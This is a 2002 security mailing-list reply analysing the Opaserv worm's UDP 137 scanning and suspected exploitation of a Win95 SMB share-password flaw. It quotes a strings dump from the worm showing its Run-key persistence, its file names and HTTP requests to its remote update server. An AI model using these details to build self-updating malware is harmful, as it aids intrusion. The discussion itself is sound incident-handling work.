Security Incidents mailing list archives
Re: Unusual volume: UDP:137 probes
From: Alain Fauconnet <alain () cscoms net>
Date: Fri, 4 Oct 2002 14:13:55 +0700
On Fri, Oct 04, 2002 at 07:58:18AM +1200, Nick FitzGerald wrote:
Richard.Grant () mail state ky us wrote: Two... You are right that Bugbear does not produce the flood of port 137 traffic currently being reported. Bugbear does some spreading via open or otherwise accessible shares (those writable with the permissions of the user that ran the EXE) but it uses standard known network resource enumeration APIs to do its work. Opaserv (aka Scrup, Scrsvr, Opasoft) aggressively scans for machines listening on port 137 and is the likely source of most of the increased port 137 activity.ScrSvr31415.KERNEL32.dll.RegisterServiceProcess.SOFTWARE\Microsoft\Wind ows\CurrentVersion\Run.Software\Microsoft\Windows\CurrentVersion\Interne t Settings.ScrSvr.ScrSvrOld.ProxyEnable.ProxyServer.\ScrSvr.exe.ScrSin.dat .ScrSout.dat.scrupd.exe.www.opasoft.com.GET http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0 HTTP/1.1..Host: www.opasoft.com.....GET http://www.opasoft.com/work/lastver HTTP/1.1..Host:<<snip>>
Talking of Opaserv, I have an example of a Win95 OSR2.1 box (yes, I know) which saw SCRSVR.EXE appear in its Windows folder while online. McAfee caught it immediately so it didn't have a chance to run. However this box *did* have passwords set on the shares (yes, all of them, I have checked). These passwords were quite non-obvious so I doubt that they could be found as a result of brute-force attack. I know that Win95 had its share of bugs regarding SMB passwords. This one looks like a good candidate: http://security-archive.merton.ox.ac.uk/bugtraq-200010/0228.html NSFOCUS Security Advisory(SA2000-05) But then it means that Opaserv goes beyond checking for passwordless shares (that's all I have seen written so far). It also exploits known vulnerabilities. Greets, _Alain_ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- RE: Unusual volume: UDP:137 probes Bamm (Robert) Visscher (Sep 30)
- <Possible follow-ups>
- Re: Unusual volume: UDP:137 probes Nick FitzGerald (Sep 30)
- RE: Unusual volume: UDP:137 probes Mark Forsyth (Sep 30)
- RE: Unusual volume: UDP:137 probes Joseph R. Gruber (Sep 30)
- Re: Unusual volume: UDP:137 probes Hugo van der Kooij (Sep 30)
- SV: Unusual volume: UDP:137 probes Peter Kruse (Oct 01)
- Re: Unusual volume: UDP:137 probes Christopher Albert (Sep 30)
- RE: Unusual volume: UDP:137 probes Richard . Grant (Oct 01)
- RE: Unusual volume: UDP:137 probes Nick FitzGerald (Oct 03)
- Re: Unusual volume: UDP:137 probes Alain Fauconnet (Oct 04)
- Re: Unusual volume: UDP:137 probes Matt Power (Oct 05)
- RE: Unusual volume: UDP:137 probes Nick FitzGerald (Oct 03)
- RE: Unusual volume: UDP:137 probes Scott, Michael R. (Oct 01)
- Re: Unusual volume: UDP:137 probes Axel Pettinger (Oct 01)
- Re: Unusual volume: UDP:137 probes James Sneeringer (Oct 01)
- maybe a simple problem Andrew Fison (Oct 02)
- Re: maybe a simple problem Igor D. Spivak (Oct 02)
- RE: maybe a simple problem Greg Reber (Oct 03)
- Re: maybe a simple problem Brad Arlt (Oct 03)
- Re: Unusual volume: UDP:137 probes James Sneeringer (Oct 01)
- Re: Unusual volume: UDP:137 probes John Sage (Oct 01)